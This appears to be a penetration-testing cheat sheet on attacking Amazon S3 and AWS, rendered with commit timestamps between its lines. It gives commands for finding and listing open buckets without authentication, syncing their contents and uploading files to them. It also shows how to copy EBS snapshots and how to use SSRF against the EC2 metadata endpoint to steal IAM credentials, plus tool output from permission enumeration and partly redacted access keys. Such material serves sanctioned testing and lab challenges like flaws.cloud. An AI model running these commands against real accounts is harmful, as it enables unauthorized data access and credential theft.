2016-11-11 09:03:35 +00:00
# Amazon Bucket S3 AWS
2018-08-12 21:30:22 +00:00
2018-12-29 12:05:29 +00:00
## Summary
- [Tools ](#tools )
- [AWS Configuration ](#aws-configuration )
- [Open Bucket ](#open-bucket )
- [Basic tests ](#basic-tests )
- [Listing files ](#listing-files )
- [Move a file into the bucket ](move-a-file-into-the-bucket )
- [Download every things ](#download-every-things )
- [Check bucket disk size ](#check-bucket-disk-size )
- [AWS - Extract Backup ](#aws---extract-backup )
- [Bucket juicy data ](#bucket-juicy-data )
2018-12-25 18:38:37 +00:00
## Tools
- [Pacu - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments ](https://github.com/RhinoSecurityLabs/pacu )
2018-12-29 12:05:29 +00:00
- [Bucket Finder - Search for readable buckets and list all the files in them ](https://digi.ninja/ )
```powershell
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
./bucket_finder.rb my_words
./bucket_finder.rb --region ie my_words
US Standard = http://s3.amazonaws.com
Ireland = http://s3-eu-west-1.amazonaws.com
Northern California = http://s3-us-west-1.amazonaws.com
Singapore = http://s3-ap-southeast-1.amazonaws.com
Tokyo = http://s3-ap-northeast-1.amazonaws.com
./bucket_finder.rb --download --region ie my_words
./bucket_finder.rb --log-file bucket.out my_words
```
- [Boto3 - Amazon Web Services (AWS) SDK for Python ](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html )
```python
import boto3
# Create an S3 client
s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1')
try:
result = s3.list_buckets()
print(result)
except Exception as e:
2019-03-15 14:09:58 +00:00
print(e)
2018-12-29 12:05:29 +00:00
```
2018-12-25 18:38:37 +00:00
## AWS Configuration
2017-06-18 16:42:12 +00:00
Prerequisites, at least you need awscli
2018-08-12 21:30:22 +00:00
```bash
2017-06-18 16:42:12 +00:00
sudo apt install awscli
```
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
You can get your credential here https://console.aws.amazon.com/iam/home?#/security_credential
but you need an aws account, free tier account : https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/
2018-08-12 21:30:22 +00:00
```javascript
2017-06-18 16:42:12 +00:00
aws configure
AWSAccessKeyId=[ENTER HERE YOUR KEY]
AWSSecretKey=[ENTER HERE YOUR KEY]
```
2018-08-12 21:30:22 +00:00
```javascript
2017-06-18 16:42:12 +00:00
aws configure --profile nameofprofile
```
2018-12-26 00:02:17 +00:00
then you can use *--profile nameofprofile* in the aws command.
Alternatively you can use environment variables instead of creating a profile.
```bash
export AWS_ACCESS_KEY_ID=ASIAZ[...]PODP56
export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ
export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
```
2017-06-18 16:42:12 +00:00
2018-12-25 18:38:37 +00:00
## Open Bucket
2017-06-18 16:42:12 +00:00
By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names
2018-08-12 21:30:22 +00:00
```bash
2016-11-11 09:03:35 +00:00
http://s3.amazonaws.com/[bucket_name]/
http://[bucket_name].s3.amazonaws.com/
2017-06-18 16:42:12 +00:00
http://flaws.cloud.s3.amazonaws.com/
2016-11-11 09:03:35 +00:00
```
2018-10-20 15:03:13 +00:00
Their names are also listed if the listing is enabled.
```xml
< ListBucketResult xmlns = "http://s3.amazonaws.com/doc/2006-03-01/" >
< Name > adobe-REDACTED-REDACTED-REDACTED< / Name >
```
2018-11-24 12:49:08 +00:00
Alternatively you can extract the name of inside-site s3 bucket with `%C0` . (Trick from https://twitter.com/0xmdv/status/1065581916437585920)
```xml
http://example.com/resources/id%C0
eg: http://redacted/avatar/123%C0
```
2018-12-29 12:05:29 +00:00
## Basic tests
### Listing files
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
```bash
aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
2016-11-11 09:03:35 +00:00
```
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
You can get the region with a dig and nslookup
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
```bash
$ dig flaws.cloud
;; ANSWER SECTION:
2018-08-12 21:30:22 +00:00
flaws.cloud. 5 IN A 52.218.192.11
2016-11-11 09:03:35 +00:00
2017-06-18 16:42:12 +00:00
$ nslookup 52.218.192.11
Non-authoritative answer:
2018-08-12 21:30:22 +00:00
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
2017-06-18 16:42:12 +00:00
```
2018-12-29 12:05:29 +00:00
### Move a file into the bucket
2018-08-12 21:30:22 +00:00
2018-10-20 15:03:13 +00:00
```bash
aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read
aws s3 cp login.html s3://$bucketName --grants read=uri=http://acs.amazonaws.com/groups/global/AllUsers
```
2018-08-12 21:30:22 +00:00
```bash
2016-11-11 09:03:35 +00:00
aws s3 mv test.txt s3://hackerone.marketing
FAIL : "move failed: ./test.txt to s3://hackerone.marketing/test.txt A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."
aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
```
2018-12-29 12:05:29 +00:00
### Download every things
2018-08-12 21:30:22 +00:00
```powershell
2017-06-18 16:42:12 +00:00
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
2017-06-05 12:57:28 +00:00
```
2018-12-29 12:05:29 +00:00
### Check bucket disk size
Use `--no-sign` for un-authenticated check.
2018-08-12 21:30:22 +00:00
```powershell
2017-07-31 22:37:04 +00:00
aws s3 ls s3://< bucketname > --recursive | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'
```
2017-06-18 16:42:12 +00:00
## AWS - Extract Backup
2018-08-12 21:30:22 +00:00
```powershell
2020-02-23 19:58:53 +00:00
$ aws --profile flaws sts get-caller-identity
2017-06-18 16:42:12 +00:00
"Account": "XXXX26262029",
2020-02-23 19:58:53 +00:00
$ aws --profile profile_name ec2 describe-snapshots
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
2017-06-18 16:42:12 +00:00
"SnapshotId": "snap-XXXX342abd1bdcb89",
Create a volume using snapshot
2020-02-23 19:58:53 +00:00
$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89
2017-06-18 16:42:12 +00:00
In Aws Console -> EC2 -> New Ubuntu
2020-02-23 19:58:53 +00:00
$ chmod 400 YOUR_KEY.pem
$ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
2017-06-18 16:42:12 +00:00
Mount the volume
2020-02-23 19:58:53 +00:00
$ lsblk
$ sudo file -s /dev/xvda1
$ sudo mount /dev/xvda1 /mnt
2017-06-18 16:42:12 +00:00
```
2018-12-29 12:05:29 +00:00
## Bucket juicy data
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting :
2018-08-12 21:30:22 +00:00
```powershell
2017-06-18 16:42:12 +00:00
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE will return the AccessKeyID, SecretAccessKey, and Token
2018-11-13 22:25:18 +00:00
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
2017-06-18 16:42:12 +00:00
```
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
2018-08-12 21:30:22 +00:00
2019-07-01 21:29:29 +00:00
## Enumerate IAM permissions
Enumerate the permissions associated with AWS credential set with [enumerate-iam ](https://github.com/andresriancho/enumerate-iam )
```powershell
git clone git@github.com:andresriancho/enumerate-iam.git
cd enumerate-iam/
pip install -r requirements.txt
./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..."
2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked!
2019-05-10 15:58:01,537 - 21345 - [INFO] -- {
"RoleDetailList": [
{
"Tags": [],
"AssumeRolePolicyDocument": {
"Version": "2008-10-17",
"Statement": [
{
...
2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked!
2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked!
2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked!
2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked!
2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked!
```
2016-11-11 09:03:35 +00:00
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2018-12-29 12:05:29 +00:00
* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis ](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets )
2017-06-05 12:57:28 +00:00
* [Bug Bounty Survey - AWS Basic test ](https://twitter.com/bugbsurveys/status/859389553211297792 )
2018-12-26 00:02:17 +00:00
* [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route ](http://flaws.cloud/ )
* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route ](http://flaws2.cloud )
2018-12-29 12:05:29 +00:00
* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org ](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/ )
2019-06-16 21:45:52 +00:00
* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity ](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/ )
2019-08-18 10:08:51 +00:00
* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity ](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/ )
* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019 ](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf )